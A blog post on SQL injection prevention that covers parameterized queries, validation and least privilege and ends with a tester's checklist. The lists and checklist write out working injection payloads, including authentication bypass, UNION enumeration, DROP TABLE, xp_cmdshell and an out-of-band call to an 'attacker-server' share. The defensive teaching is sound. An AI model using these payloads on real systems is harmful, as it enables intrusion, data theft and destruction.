Open in app

Sign in

Write

Sign in

SQL Injection prevention

Long Vu
3 min readNov 15, 2024

What SQL Injection is

SQL injection (SQLi) is a significant web security vulnerability that allows attackers to manipulate SQL queries. By inserting harmful SQL code into input fields, they can access databases, steal sensitive information, or modify and delete data.

Attack mechanism

Common Attack Vectors to Guard Against

  • ' OR '1'='1
  • ; DROP TABLE users;--
  • ' UNION SELECT * FROM sensitive_data;--
  • '; EXEC xp_cmdshell('net user');--

We can prevent SQL injection attacks using various techniques, such as:

  • Parameterized Queries
-- Good
SELECT * FROM users WHERE username = ? AND password = ?

-- Bad
SELECT * FROM users WHERE username = '" + username + "'
  • Input Validation
# Whitelist approach
def validate_input(input_str):
    return bool(re.match('^[a-zA-Z0-9_]+$', input_str))

# Type validation
def validate_id(id_value):
    return isinstance(id_value, int) and id_value > 0
  • Escaping Special Characters
def escape_string(value):
    return value.replace("'", "''").replace("\\", "\\\\")
  • Stored Procedures
CREATE PROCEDURE GetUserData
    @username varchar(50)
AS
BEGIN
    SELECT * FROM users WHERE username = @username
END
  • Database User Permissions
-- Restrict to minimum required privileges
GRANT SELECT, INSERT ON users TO 'app_user'@'localhost';
REVOKE DROP, ALTER ON users FROM 'app_user'@'localhost';
  • Use Web Application Firewalls (WAF)
  • Implement query timeout limits
  • Enable prepared statement caching
  • Use connection pooling with sanitized connections

Tools to consider

  • Burp Suite
  • SQLmap
  • OWASP ZAP
  • sqlninja
  • havij

Recommendation

  • Test all input fields
  • Test different HTTP methods
  • Document everything
  • Verify fixes
  • Test in all environments

As an engineer, we recommend using a checklist to ensure that your code is tested and covers SQL injection vulnerabilities.

# SQL Injection Testing Checklist

## 1. Basic Tests
- [ ] Single quote test: `'`
- [ ] Double quote test: `"`
- [ ] Semicolon test: `;`
- [ ] Comment tests: `--`, `#`, `/**/`
- [ ] OR/AND tests: `' OR '1'='1`, `' AND '1'='1`

## 2. Authentication Bypass
- [ ] Login bypass: `' OR 1=1--`
- [ ] Password field: `' OR 'x'='x`
- [ ] Username enumeration: `' OR username LIKE 'a%`
- [ ] Empty password: `' OR 'x'='x'#`

## 3. UNION Attacks
- [ ] Column count: `' UNION SELECT NULL--` (increment NULLs)
- [ ] Data type discovery: `' UNION SELECT 'a',NULL,NULL--`
- [ ] Table enumeration: `' UNION SELECT table_name,NULL FROM information_schema.tables--`
- [ ] Column enumeration: `' UNION SELECT column_name,NULL FROM information_schema.columns--`

## 4. Blind SQL Injection
- [ ] Boolean-based: `' AND 1=1--` vs `' AND 1=2--`
- [ ] Time-based: `' AND SLEEP(5)--`
- [ ] Out-of-band: `'; EXEC master..xp_dirtree '\\attacker-server\share'`

## 5. Error-Based Tests
- [ ] Type conversion: `' AND 1=CONVERT(int,(SELECT @@VERSION))--`
- [ ] XML parsing: `' AND ExtractValue(1,CONCAT(0x7e,version()))--`
- [ ] Arithmetic operations: `' AND 1=(SELECT 1/0)--`

## 6. Special Characters
- [ ] Encoded characters: `%27`, `%20`, `%00`
- [ ] Unicode: `Á`, `Â`, `Ã`
- [ ] Special whitespace: tab, newline, carriage return
- [ ] NULL byte: `%00`

## 7. Input Validation Tests
- [ ] Case sensitivity: `UnIoN`, `SeLeCt`
- [ ] Whitespace variations: `'/**/OR/**/1=1`
- [ ] Alternative operators: `' || '1'='1`, `' && '1'='1`
- [ ] String concatenation: `'+'1'+'='+'1`

## 8. Database-Specific Tests
### MySQL
- [ ] Information gathering: `VERSION()`, `DATABASE()`
- [ ] String operations: `CONCAT()`, `GROUP_CONCAT()`
- [ ] File operations: `LOAD_FILE()`, `INTO OUTFILE`

### SQL Server
- [ ] System commands: `xp_cmdshell`
- [ ] File operations: `bulk insert`
- [ ] Registry access: `xp_regread`

### Oracle
- [ ] PL/SQL injection: `EXECUTE IMMEDIATE`
- [ ] HTTP requests: `UTL_HTTP`
- [ ] File operations: `UTL_FILE`

## 9. Advanced Tests
- [ ] Second-order injection
- [ ] Stored procedure injection
- [ ] Mass assignment
- [ ] Parameter pollution
- [ ] HTTP header injection

## 10. Security Controls Verification
- [ ] Input sanitization
- [ ] Prepared statements
- [ ] Stored procedures
- [ ] WAF bypass attempts
- [ ] Error message disclosure
- [ ] Access control verification

## Documentation Requirements
- [ ] Test case ID
- [ ] Input vectors used
- [ ] Expected results
- [ ] Actual results
- [ ] Screenshots/evidence
- [ ] Severity rating
- [ ] Remediation steps

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Sql Injection
Long Vu
Long Vu

Written by Long Vu

28 Followers
27 Following

Product builder, Engineering Manager, AI enthusiastic

No responses yet

Write a response

What are your thoughts?

More from Long Vu

See all from Long Vu

Recommended from Medium

Lists

Staff picks

826 stories1649 saves

Stories to Help You Level-Up at Work

19 stories948 saves

Self-Improvement 101

20 stories3355 saves

Productivity 101

20 stories2818 saves
See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams